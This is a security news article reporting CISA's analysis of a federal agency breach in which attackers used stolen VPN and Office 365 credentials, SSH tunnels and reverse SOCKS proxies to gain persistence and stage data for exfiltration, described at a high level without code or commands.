Cybersecurity and Infrastructure Security Agency (CISA) revealed that a hacker breached a US federal agency and threat actors exfiltrated data.
CISA published a detailed incident report related to the incident but didn’t disclose the name of the hacked agency. Threat actors implanted a malware in the network of an unnamed federal agency that was able to avoid detection.
“The Cybersecurity and Infrastructure Security Agency (CISA) responded to a recent threat actor’s cyberattack on a federal agency’s enterprise network.” reads the analysis report published by CISA. “By leveraging compromised credentials, the cyber threat actor implanted sophisticated malware—including multi-stage malware that evaded the affected agency’s anti-malware protection—and gained persistent access through two reverse Socket Secure (SOCKS) proxies that exploited weaknesses in the agency’s firewall.”
The intrusion was detected by the EINSTEIN, the CISA’s intrusion detection system that is used to monitor federal civilian networks.
The threat actors initially leveraged compromised credentials for Microsoft Office 365 (O365) accounts, domain administrator accounts, and credentials for the agency’s Pulse Secure VPN server.
“First the threat actor logged into a user’s O365 account from Internet Protocol (IP) address 91.219.236[.]166 and then browsed pages on a SharePoint site and downloaded a file (Data from Information Repositories: SharePoint [T1213.002]). The cyber threat actor connected multiple times by Transmission Control Protocol (TCP) from IP address 185.86.151[.]223 to the victim organization’s virtual private network (VPN) server (Exploit Public-Facing Application [T1190]).” continues the report.
CISA analysts speculate the attackers obtained the credentials from an unpatched agency VPN server by exploiting the CVE-2019-11510—in Pulse Secure.
Once the attackers logged into Office 365 accounts, they attempted to view and download help desk email attachments with “Intranet access” and “VPN passwords” in the subject line. The attackers have done it to gather additional information on the target network, they also enumerated the Active Directory and Group Policy key and changed a registry key for the Group Policy.
In order to establish Persistence and Command and Control on the federal agency network, the attackers created a persistent Secure Socket Shell (SSH) tunnel/reverse SOCKS proxy.
The intruders connected a hard drive in the agency’s network they controlled as a locally mounted remote share.
“The mounted file share allowed the actor to freely move during its operations while leaving fewer artifacts for forensic analysis,” the report continues.
The attacker created a local account on the network that allowed them to browse the local network, run PowerShell commands, and exfiltrate data stored in compressed Zip files with several files and directories on them. CISA couldn’t confirm if the attacker exfiltrated these ZIP archives.
According to CISA, the malware installed on the network of the federal agency was able to overcome the agency’s anti-malware protection, and inetinfo.exe escaped quarantine.
Additional technical details, including Indicators of Compromise (IoCs) are included in the Analysis Report published by CISA.
(SecurityAffairs – hacking, federal agency)